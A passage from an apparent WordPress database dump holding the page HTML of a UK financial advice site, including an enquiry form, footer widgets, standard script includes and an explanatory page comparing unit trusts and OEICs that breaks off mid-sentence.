method=\"post\" enctype=\"multipart/form-data\">&#13;\n        <div class=\"iphorm-inner iphorm-inner-1\">&#13;\n            <input type=\"hidden\" name=\"iphorm_id\" value=\"1\"/><input type=\"hidden\" name=\"iphorm_uid\" value=\"53004a3f4eb22\"/><input type=\"hidden\" name=\"form_url\" value=\"http://www.equalitywalk.org.uk/\"/><input type=\"hidden\" name=\"referring_url\" value=\"\"/><input type=\"hidden\" name=\"post_id\" value=\"30\"/><input type=\"hidden\" name=\"post_title\" value=\"Trusts\"/><h3 class=\"iphorm-title\">Contact Equity SMART&#13;\n                                        </h3><p class=\"iphorm-description\"><big>For expert impartial advice and a FREE consultation with no obligation fill out the short form below.<br/><br/>&#13;\n&#13;\nor<br/><br/><b>Call Us FREE on <span class=\"rTapNumber13629\"/></b>&#13;\n</big></p>&#13;\n                                    	            		<div class=\"iphorm-success-message iphorm-hidden\"/>&#13;\n            	                        <div class=\"iphorm-elements iphorm-elements-1 iphorm-clearfix\">&#13;\n                <div class=\"iphorm-group-wrap iphorm_1_6-group-wrap iphorm-clearfix iphorm-labels-above iphorm-group-style-plain iphorm-group-alignment-proportional\">&#13;\n    <div class=\"iphorm-group-elements\">&#13;\n                <div class=\"iphorm-group-row iphorm-clearfix iphorm-group-row-1cols\"><div class=\"iphorm-element-wrap iphorm-element-wrap-text iphorm_1_1-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-required\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-text iphorm_1_1-element-spacer\">&#13;\n                    <label for=\"iphorm_1_1_53004a3f4eb22\">&#13;\n                Name                                    <span class=\"iphorm-required\">(required)</span>&#13;\n                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-text iphorm_1_1-input-wrap\">&#13;\n            <input class=\"iphorm-element-text  iphorm_1_1\" id=\"iphorm_1_1_53004a3f4eb22\" type=\"text\" name=\"iphorm_1_1\" value=\"\" style=\"width: 200px;\"/></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n    </div>        </div> <!-- /.iphorm-group-row -->&#13;\n    </div> <!-- /.iphorm-group-elements -->&#13;\n</div> <!-- /.iphorm-group-wrap --><div class=\"iphorm-group-wrap iphorm_1_8-group-wrap iphorm-clearfix iphorm-labels-above iphorm-group-style-plain iphorm-group-alignment-proportional\">&#13;\n    <div class=\"iphorm-group-elements\">&#13;\n                <div class=\"iphorm-group-row iphorm-clearfix iphorm-group-row-2cols\"><div class=\"iphorm-element-wrap iphorm-element-wrap-text iphorm_1_5-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-required\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-text iphorm_1_5-element-spacer\">&#13;\n                    <label for=\"iphorm_1_5_53004a3f4eb22\">&#13;\n                Contact Number                                    <span class=\"iphorm-required\">(required)</span>&#13;\n                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-text iphorm_1_5-input-wrap\">&#13;\n            <input class=\"iphorm-element-text  iphorm_1_5\" id=\"iphorm_1_5_53004a3f4eb22\" type=\"text\" name=\"iphorm_1_5\" value=\"\" style=\"width: 200px;\"/></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n    </div><div class=\"iphorm-element-wrap iphorm-element-wrap-text iphorm_1_2-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-required\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-text iphorm_1_2-element-spacer\">&#13;\n                    <label for=\"iphorm_1_2_53004a3f4eb22\">&#13;\n                Email address                                    <span class=\"iphorm-required\">(required)</span>&#13;\n                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-text iphorm_1_2-input-wrap\">&#13;\n            <input class=\"iphorm-element-text  iphorm_1_2\" id=\"iphorm_1_2_53004a3f4eb22\" type=\"text\" name=\"iphorm_1_2\" value=\"\" style=\"width: 200px;\"/></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n    </div></div><div class=\"iphorm-group-row iphorm-clearfix iphorm-group-row-2cols\"><div class=\"iphorm-element-wrap iphorm-element-wrap-checkbox iphorm_1_11-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-optional\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-checkbox iphorm_1_11-element-spacer\">&#13;\n                    <label class=\"iphorm_1_11-outer-label\">&#13;\n                What Would You Like To Discuss?                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-checkbox iphorm_1_11-input-wrap\">&#13;\n            <div class=\"iphorm-input-ul iphorm-input-checkbox-ul iphorm_1_11-input-ul iphorm-options-block iphorm-clearfix\">&#13;\n                            <div class=\"iphorm-input-li iphorm-input-checkbox-li iphorm_1_11-input-li\">&#13;\n                    <label class=\"iphorm_1_11_1_label\">&#13;\n                        <input class=\"iphorm-element-checkbox iphorm_1_11 iphorm_1_11_1\" type=\"checkbox\" name=\"iphorm_1_11[]\" id=\"iphorm_1_11_53004a3f4eb22_1\" value=\"Pensions\"/>&#13;\n                        Pensions                    </label>&#13;\n                </div>&#13;\n                            <div class=\"iphorm-input-li iphorm-input-checkbox-li iphorm_1_11-input-li\">&#13;\n                    <label class=\"iphorm_1_11_2_label\">&#13;\n                        <input class=\"iphorm-element-checkbox iphorm_1_11 iphorm_1_11_2\" type=\"checkbox\" name=\"iphorm_1_11[]\" id=\"iphorm_1_11_53004a3f4eb22_2\" value=\"Insurance\"/>&#13;\n                        Insurance                    </label>&#13;\n                </div>&#13;\n                            <div class=\"iphorm-input-li iphorm-input-checkbox-li iphorm_1_11-input-li\">&#13;\n                    <label class=\"iphorm_1_11_3_label\">&#13;\n                        <input class=\"iphorm-element-checkbox iphorm_1_11 iphorm_1_11_3\" type=\"checkbox\" name=\"iphorm_1_11[]\" id=\"iphorm_1_11_53004a3f4eb22_3\" value=\"Trusts\"/>&#13;\n                        Trusts                    </label>&#13;\n                </div>&#13;\n                            <div class=\"iphorm-input-li iphorm-input-checkbox-li iphorm_1_11-input-li\">&#13;\n                    <label class=\"iphorm_1_11_4_label\">&#13;\n                        <input class=\"iphorm-element-checkbox iphorm_1_11 iphorm_1_11_4\" type=\"checkbox\" name=\"iphorm_1_11[]\" id=\"iphorm_1_11_53004a3f4eb22_4\" value=\"Investments\"/>&#13;\n                        Investments                    </label>&#13;\n                </div>&#13;\n                            <div class=\"iphorm-input-li iphorm-input-checkbox-li iphorm_1_11-input-li\">&#13;\n                    <label class=\"iphorm_1_11_5_label\">&#13;\n                        <input class=\"iphorm-element-checkbox iphorm_1_11 iphorm_1_11_5\" type=\"checkbox\" name=\"iphorm_1_11[]\" id=\"iphorm_1_11_53004a3f4eb22_5\" value=\"Wealth\"/>&#13;\n                        Wealth                    </label>&#13;\n                </div>&#13;\n                            <div class=\"iphorm-input-li iphorm-input-checkbox-li iphorm_1_11-input-li\">&#13;\n                    <label class=\"iphorm_1_11_6_label\">&#13;\n                        <input class=\"iphorm-element-checkbox iphorm_1_11 iphorm_1_11_6\" type=\"checkbox\" name=\"iphorm_1_11[]\" id=\"iphorm_1_11_53004a3f4eb22_6\" value=\"Other\"/>&#13;\n                        Other                    </label>&#13;\n                </div>&#13;\n                        </div>&#13;\n                    </div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n</div><div class=\"iphorm-element-wrap iphorm-element-wrap-textarea iphorm_1_10-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-optional\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-textarea iphorm_1_10-element-spacer\">&#13;\n                    <label for=\"iphorm_1_10_53004a3f4eb22\">&#13;\n                Comments                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-textarea iphorm_1_10-input-wrap\">&#13;\n            <textarea class=\"iphorm-element-textarea  iphorm_1_10\" id=\"iphorm_1_10_53004a3f4eb22\" name=\"iphorm_1_10\" rows=\"5\" cols=\"25\"/></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n    </div>        </div> <!-- /.iphorm-group-row -->&#13;\n    </div> <!-- /.iphorm-group-elements -->&#13;\n</div> <!-- /.iphorm-group-wrap --><div class=\"iphorm-element-wrap iphorm-element-wrap-captcha iphorm_1_4-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-required\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-captcha iphorm_1_4-element-spacer\">&#13;\n                    <label for=\"iphorm_1_4_53004a3f4eb22\">&#13;\n                Type the characters                                    <span class=\"iphorm-required\">(required)</span>&#13;\n                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-captcha iphorm_1_4-input-wrap\">&#13;\n            <input class=\"iphorm-element-captcha  iphorm_1_4\" id=\"iphorm_1_4_53004a3f4eb22\" type=\"text\" name=\"iphorm_1_4\" value=\"\" style=\"width: 200px;\"/></div>&#13;\n        <div class=\"iphorm-captcha-image-wrap iphorm-clearfix iphorm_1_4-captcha-image-wrap\">&#13;\n            <div class=\"ifb-captcha-image-inner\">&#13;\n                &#13;\n            </div>&#13;\n        </div>&#13;\n&#13;\n        <script type=\"text/javascript\"><![CDATA[\r\n        <!--\r\n        jQuery(document).ready(function ($) {\r\n            $(\'#iphorm-captcha-image-iphorm_1_4_53004a3f4eb22\').hover(function () {\r\n                $(this).stop().fadeTo(\'slow\', \'0.3\');\r\n            }, function () {\r\n                $(this).stop().fadeTo(\'slow\', \'1.0\');\r\n            }).click(function () {\r\n                var newSrc = $(this).attr(\'src\').replace(/&t=.+/, \'&t=\' + new Date().getTime());\r\n                $(this).attr(\'src\', newSrc);\r\n            });\r\n        });\r\n        //-->\r\n        ]]></script><div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n</div><div class=\"iphorm-hidden\">&#13;\n    <label>This field should be left blank<input type=\"text\" name=\"iphorm_1_0\"/></label>&#13;\n</div>                <div class=\"iphorm-submit-wrap iphorm-submit-wrap-1 iphorm-clearfix\">&#13;\n                	<div class=\"iphorm-submit-input-wrap iphorm-submit-input-wrap-1\">&#13;\n                        <button class=\"iphorm-submit-element\" type=\"submit\" name=\"iphorm_submit\"><span><em>Send Enquiry</em></span></button>&#13;\n                    </div>&#13;\n                    <div class=\"iphorm-loading-wrap\"><span class=\"iphorm-loading\">Please wait...</span></div>&#13;\n                </div>&#13;\n            </div>&#13;\n                                            </div>&#13;\n            &#13;\n    <script type=\"text/javascript\"><![CDATA[\r\n	<!--\r\n	jQuery(\'#iphorm-outer-53004a3f4eb22 script\').remove();\r\n	//-->\r\n	]]></script></form></div></div>&#13;\n        <br/><script type=\"text/javascript\"><![CDATA[// <![CDATA[\r\njQuery(document).ready(function ($) {     $(\'a[href=\"#standard\"]\').click(function () {         $(\'.iphorm-fancybox-link\').click();         return false;     }); });\r\n// ]]&gt;]]></script></div>&#13;\n					</div>&#13;\n			</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Latest Wealth Management News</p>		<ul><li>&#13;\n				<a href=\"http://www.equalitywalk.org.uk/seven-deadly-investment-sins/\">The Seven Deadly Investment Sins</a>&#13;\n							<span class=\"post-date\">February 10, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"http://www.equalitywalk.org.uk/mortgage-strategic-alliance/\">Mortgage Strategic Alliance</a>&#13;\n							<span class=\"post-date\">February 5, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"http://www.equalitywalk.org.uk/esmart-money-januaryfebruary-2014-issue/\">eSmart Money January/February 2017 issue</a>&#13;\n							<span class=\"post-date\">January 7, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"http://www.equalitywalk.org.uk/how-much-money-can-i-get-pension/\">How much Money can I get out of my Pension?</a>&#13;\n							<span class=\"post-date\">October 31, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"http://www.equalitywalk.org.uk/what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n							<span class=\"post-date\">September 5, 2017</span>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-13\" class=\"footer-widget-col widget_text\"><p>Equity SMART</p>			<div class=\"textwidget\"><p>This year, 2017, sees us reach our 20 year anniversary. In all that time we’ve seen real changes in the financial market, but our core values have forever remained the same. Put simply, we’ve always striven to offer unbiased and objective financial advice, with a view to protecting and enhancing our client’s wealth and sense of well-being. Welcome to our company.</p>&#13;\n</div>&#13;\n		<div style=\"clear:both;\"/></div><div id=\"recent_works-widget-3\" class=\"footer-widget-col recent_works\"><p>Useful Guides</p>		<div class=\"recent-works-items clearfix\">&#13;\n								<a href=\"http://www.equalitywalk.org.uk/portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n			<img width=\"66\" height=\"66\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/11/cats-66x66.jpg\" class=\"attachment-recent-works-thumbnail wp-post-image\" alt=\"cats\"/></a>&#13;\n						<a href=\"http://www.equalitywalk.org.uk/portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n			<img width=\"66\" height=\"66\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/10/cric-66x66.jpg\" class=\"attachment-recent-works-thumbnail wp-post-image\" alt=\"cric\"/></a>&#13;\n						<a href=\"http://www.equalitywalk.org.uk/portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n			<img width=\"66\" height=\"66\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/10/auto-66x66.jpg\" class=\"attachment-recent-works-thumbnail wp-post-image\" alt=\"auto\"/></a>&#13;\n						<a href=\"http://www.equalitywalk.org.uk/portfolio-items/investing-income/\" title=\"Investing For Income\">&#13;\n			<img width=\"66\" height=\"66\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/10/investing-66x66.jpg\" class=\"attachment-recent-works-thumbnail wp-post-image\" alt=\"investing\"/></a>&#13;\n				</div>&#13;\n&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"social_links-widget-3\" class=\"footer-widget-col social_links\"><p>Connect With Us</p>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://www.equalitywalk.org.uk/feed/\" target=\"\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																					</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col last\"/></section></div>&#13;\n	</footer><footer id=\"footer\"><div class=\"avada-row\">&#13;\n					<ul class=\"copyright\"><li><br/><br/></li>&#13;\n			</ul></div>&#13;\n	</footer></div><!-- wrapper -->&#13;\n	&#13;\n	&#13;\n	&#13;\n	<!-- W3TC-include-js-head -->&#13;\n&#13;\n	&#13;\n<script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main-min.js\"/></body>','Trusts and Trust Protection Planning','The correct use of Trusts can be an effective asset protection strategy. Shielding assets isn\'t easy to do in our increasingly litigious society...','publish','closed','closed','','trusts-and-trust-protection-planning','','','2017-09-21 16:34:42','2017-09-21 16:34:42','',0,'http://www.equalitywalk.org.uk/trusts-and-trust-protection-planning',0,'page','',0),(112,1,'2017-09-21 16:34:42','2017-09-21 16:34:42','<body class=\"page page-id-122 page-child parent-pageid-28 page-template page-template-side-navigation-php light  wpb-js-composer js-comp-ver-3.5.4 vc_responsive\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n					<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v2\">&#13;\n		&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul id=\"nav\" class=\"menu\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214\"><a href=\"/wealth-management\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44\"><a href=\"/wealth-platform\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27\"><a href=\"/pensions\">Pensions</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"/pensions/pension-release\">Pension Release</a></li>&#13;\n	<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"/pensions/pension-transfer\">Pension Transfer</a></li>&#13;\n	<li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-136\"><a href=\"/pensions/auto-enrolment-pensions\">Auto Enrolment Pensions</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"/auto-enrolment-report\">Auto Enrolment Report</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"/pension-review\">Pension Review</a></li>&#13;\n	<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"/pensions/sipps\">SIPPS</a></li>&#13;\n	<li id=\"menu-item-105\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-105\"><a href=\"/pensions/stakeholder-pensions\">Stakeholder Pensions</a></li>&#13;\n	<li id=\"menu-item-127\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-127\"><a href=\"/pensions/occupational-pensions\">Occupational Pensions</a></li>&#13;\n	<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"/pensions/group-pension-plan\">Group Pension Plan</a></li>&#13;\n	<li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"/pensions/income-drawdown\">Income Drawdown</a></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852\"><a>More Information</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"/tracking-down-your-lost-pension\">Lost Pension</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-47\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-page-ancestor current-menu-ancestor current-menu-parent current-page-parent current_page_parent current_page_ancestor menu-item-has-children menu-item-47\"><a href=\"/investments\">Investments</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-121\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-121\"><a href=\"isas\">ISAs</a></li>&#13;\n	<li id=\"menu-item-118\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-118\"><a href=\"lump-sum-investment\">Lump Sum Investment</a></li>&#13;\n	<li id=\"menu-item-102\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-102\"><a href=\"offshore-bonds\">Offshore Bonds</a></li>&#13;\n	<li id=\"menu-item-124\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-menu-item page_item page-item-122 current_page_item menu-item-124\"><a href=\"unit-trusts-oeics\">Unit Trusts &amp; OEICs</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-46\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-46\"><a href=\"/trusts\">Trusts</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-108\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-108\"><a href=\"/asset-protection-trust\">Asset Protection Trust</a></li>&#13;\n	<li id=\"menu-item-114\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-114\"><a href=\"/discretionary-trusts\">Discretionary Trusts</a></li>&#13;\n	<li id=\"menu-item-115\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-115\"><a href=\"/absolute-trusts\">Absolute Trusts</a></li>&#13;\n	<li id=\"menu-item-143\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-143\"><a href=\"/gift-loan-schemes\">Gift &amp; Loan Trust</a></li>&#13;\n	<li id=\"menu-item-146\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-146\"><a href=\"/wills-and-trust\">Wills and Trust</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-3381\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-3381\"><a href=\"/insurance-protection\">Insurance</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-3535\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3535\"><a href=\"/critical-illness-insurance-2-0\">Critical Illness</a></li>&#13;\n	<li id=\"menu-item-3585\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3585\"><a href=\"/serious-illness-cover\">Serious Illness</a></li>&#13;\n	<li id=\"menu-item-4633\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4633\"><a href=\"/relevant-life-plan\">Relevant Life Plan</a></li>&#13;\n	<li id=\"menu-item-7228\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7228\"><a href=\"/life-insurance\">Life Insurance</a></li>&#13;\n	<li id=\"menu-item-7243\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7243\"><a href=\"/business-protection-insurance\">Business Protection</a></li>&#13;\n</ul></li>&#13;\n		</ul></nav></div>&#13;\n	</header></div>		</div>&#13;\n				<div id=\"sliders-container\">&#13;\n									</div>&#13;\n					<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										Unit Trusts &amp; OEICs										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"/investments\" title=\"Investments\">Investments</a></li><li>Unit Trusts &amp; OEICs</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n													<div id=\"main\" class=\"\" style=\"overflow:hidden !important;\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n					<div id=\"content\" style=\"float:left;\">&#13;\n				<div id=\"post-122\" class=\"post-122 page type-page status-publish hentry\">&#13;\n			<span class=\"entry-title\" style=\"display: none;\">Unit Trusts &amp; OEICs</span>&#13;\n			<span class=\"updated\" style=\"display: none;\">June 19th, 2017</span>&#13;\n			<span class=\"vcard\" style=\"display: none;\"><span class=\"fn\"><a href=\"/author/rs-r-admin\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></span></span>&#13;\n						<div class=\"post-content\">&#13;\n				<div><a href=\"#\"/></div>&#13;\n<div>&#13;\n<h4>Unit trusts and open ended investment companies (OEICs) are forms of shared investments, or funds that allow you to pool your money with thousands of other people and invest in world stock markets.</h4>&#13;\n</div>&#13;\n<p>Unit Trusts have proved incredibly popular because your money is invested in a broad spread of shares and your risk is reduced. But they’re gradually being replaced by their modern equivalent, the OEIC fund.</p>&#13;\n<p>OEICs were first sold to UK investors in 1997. The FSA’s rules governing which types of fund can convert to OEICs were relaxed in 2001 and since then, the majority of fund management groups have converted their unit trusts to OEICs or launched these funds.</p>&#13;\n<p>You can invest in a unit trusts and OEICs with as little as £25 a month or a £500 lump sum, which means it can be a relatively painless way to get a foothold in the stock market. Typically you will pay an initial charge of 5% to 6% and an annual management charge of between 1% and 1.75%.</p>&#13;\n<h2>The Differences</h2>&#13;\n<p>Unit trusts and OEICs are both open-ended investments, which means that investors can freely buy and sell shares in the fund, which then grows or shrinks accordingly. It means the value of the shares you own in an OEIC, or units in a unit trust, always reflects the value of the fund’s assets.</p>&#13;\n<p>But there are a few key differences…</p>&#13;\n<p>Pricing<br/>&#13;\nWhen investing in unit trusts, you buy units at the offer price and sell at the lower bid price. The difference in the two prices is known as the spread. To make a return on your investment the bid price must rise above the offer before you sell the units.</p>&#13;\n<p>An OEIC fund has a single price, directly linked to the value of the fund’s underlying investments. All shares are bought and sold at this single price, so there is no need to calculate the spread. The OEIC has been described as a ‘what you see is what you get product’.</p>&#13;\n<p>Flexibility<br/>&#13;\nAn OEIC fund can offer different types of share or sub fund to suit different types of investor, so private individuals can invest in the same funds as large institutions and pension fund managers.</p>&#13;\n<p>The expertise of different fund management teams can be combined to benefit both large and small investors, while streamlining the administration and management costs of the fund.</p>&#13;\n<p>Clients receive less paperwork, as each OEIC will produce one report and accounts for all sub funds, instead of separate reports for each fund.</p>&#13;\n<p>Complexity<br/>&#13;\nIn legal terms, unit trusts are much more complex. In fact, this is the main reason for their rapid conversion to OEICs. Unit trusts entitle an investor to participate in the assets of the trust, without actually owning those assets. Investors in an OEIC, meanwhile, buy shares in that investment company.</p>&#13;\n<p>The ownership of unit trusts is divided into units. These rise and fall in value in line with the share price performance of the fund’s underlying assets.</p>&#13;\n<p>Management<br/>&#13;\nWith unit trusts, the fund’s assets are protected by an independent trustee and are managed by a fund manager. OEICs are protected by an independent depository and managed by an authorised corporate director.</p>&#13;\n<p>Charges<br/>&#13;\nUnit trusts and OEICs usually have an up-front buying charge, typically 3%-5%, and an annual 